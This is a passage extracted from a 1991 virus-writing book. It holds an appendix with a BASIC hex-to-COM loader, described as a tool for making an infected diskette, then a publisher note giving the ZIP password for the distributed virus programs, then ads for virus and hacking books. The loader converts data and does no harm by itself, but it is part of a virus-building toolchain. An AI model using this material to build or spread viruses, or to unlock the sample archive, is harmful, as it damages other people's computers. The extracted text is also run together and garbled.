Ludwig, Mark A., The Little Black Book of Computer Viruses,Vol. 1, (American Eagle Publications: Tucson, Az) 1991, ISBN0-929408-02-0

14. Appendix A: The Hex Loader

The following BASIC program, LOAD.BAS, will translate the HEXlisting into a COM file. When the program runs, you will be prompted forboth source and destination files. When asked for the source file name,enter the HEX file name, including the “HEX”, and do likewise for thedestination COM file name. The program will create the COM file youspecified from the HEX file. It can then be used with the loader to makean infected diskette.

10 PRINT “Source file”;20 INPUT SFNAME$30 PRINT “Destination file”;40 INPUT DFNAME$50 OPEN SFNAME$ FOR INPUT AS #160 OPEN DFNAME$ FOR RANDOM AS #2 LEN=170 FIELD 2, 1 AS O$80 E=090 LINECT=0100 IF EOF(1) THEN GOTO 160110 LINE INPUT #1, S$120 LINECT=LINECT+1130 GOSUB 200140 GOTO 100150 IF E=1 THEN GOTO 170160 PRINT “Translation complete.”170 CLOSE #1180 CLOSE #2190 END200 REM THIS SUBROUTINE DECOMPOSES ONE LINE OF THE HEX FILE


210 H$=LEFT$(S$,3)220 H$=RIGHT$(H$,2)230 GOSUB 540240 COUNT%=X%250 CSUM%=COUNT%260 H$=LEFT$(S$,7)270 H$=RIGHT$(H$,4)280 GOSUB 540290 ADDR%=X%300 CSUM%=CSUM%+(ADDR%\256)+(ADDR% AND 255)310 H$=LEFT$(S$,9)320 H$=RIGHT$(H$,2)330 IF H$<>"00" THEN GOTO 160340 FOR J%=1 TO COUNT%350 H$=LEFT$(S$,9+2*J%)360 H$=RIGHT$(H$,2)370 GOSUB 500380 CSUM%=CSUM%+X%390 LSET O$=C$400 PUT #2, ADDR%+J%410 NEXT J%420 H$=LEFT$(S$,11+2*COUNT%)430 H$=RIGHT$(H$,2)440 GOSUB 540450 CSUM%=CSUM%+X%460 IF (CSUM% AND 255) = 0 THEN RETURN470 PRINT “Checksum error in line ”;LINECT480 E=1490 GOTO 150500 REM THIS SUBROUTINE CONVERTS A HEX STRING IN H$ TO A BYTE in C$510 GOSUB 540520 C$=CHR$(X%)530 RETURN540 REM THIS SUBROUTINE CONVERTS A HEX STRING IN H$ TO AN INTEGER IN X550 X%=0560 IF LEN(H$)=0 THEN RETURN570 Y%=ASC(H$)-48580 IF Y%>9 THEN Y%=Y%-7590 X%=16*X%+Y%600 H$=RIGHT$(H$,LEN(H$)-1)610 GOTO 560


Come visit American EaglePublications, Inc. to get the programs

discussed here.

��

For security reasons, the programsdistributed with this file are encrypted

in ZIP format. To get them use the following password:

tn123ab

If you can’t figure out how to use ZIPand decrypt the files, do not call or

email us. If you can’t do that, you’retoo stupid to have any business touch-

ing these files anyhow.

http://www.ameaglepubs.com

Dr. Ludwig is back in black!

ISBN 0-929408-33-0, 232 pages, $16.95

In this brand new book, Dr. Ludwig explores the fascinating world of email viruses in a way nobodyelse dares! Here you will learn about how these viruses work and what they can and cannot do from aveteran hacker and virus researcher. Why settle for the vague generalities of other books when youcan have page after page of carefully explained code and a fascinating variety of live viruses toexperiment with on your own computer or check your antivirus software with? In this book you'lllearn the basics of viruses that reproduce through email, and then go on to explore how antivirusprograms catch them and how wiley viruses evade the antivirus programs. You'll learn aboutpolymorphic and evolving viruses. You'll learn how viruse writers use exploits - bugs in programslike Outlook Express - to get their code to execute without your consent. You'll learn about logicbombs and the social engineering side of viruses - not the social engineering of old time hackers, butthe tried and true scientific method behind turning a replicating program into a virus that infectsmillions of computers.Yet Dr. Ludwig doesn't stop here. He faces the sobering possibilities of emailviruses that lie just around the corner . . . viruses that could literally change the history of the humanrace, for better or worse.Admittedly this would be a dangerous book in thewrong hands.Yet it wouldbe more dangerous if it didn't get into the right hands. The next major virus attack could see millionsof computers wiped clean in a matter of hours. With this book, you'll have a fighting chance to spotthe troublecoming and avoid it, while the multitudes that are dependent on a canned program to keepthem out of trouble will get taken out. In short, this is an utterly fascinating book.You'll never look atcomputer viruses the same wayagain after reading it.

ISBN 0-929408-34-9, 464 pages $34.95

The world of hacking changes continuously. Yesterday's hacks are today's rusty locks that nolonger work. The security guys are constantly fixing holes, and the hackers are constantlychanging their tricks. This new fourth edition of the - just released in December,2001 - will keepyouup todateon the world of hacking. It's classicMeinel at her best, leadingyouthrough the tunnels and back doors of the internet that is accessible to the beginner, yetentertaining and educational to the advanced hacker. With major new sections on exploring andhacking websites, and hacker war, and updates to cover the latest Windows operating systems,the is bigger andbetter thanever!

Happy Hacker

Happy Hacker

Order from www.ameaglepubs.com today!

http://www.ameaglepubs.com

Documents

Technical Notes #1 - pudn.comread.pudn.com/downloads165/sourcecode/asm/756887/tnote1.pdfmonitoring is accomplished by hooking the BIOS interrupt 13H, which is the BIOS disk/diskette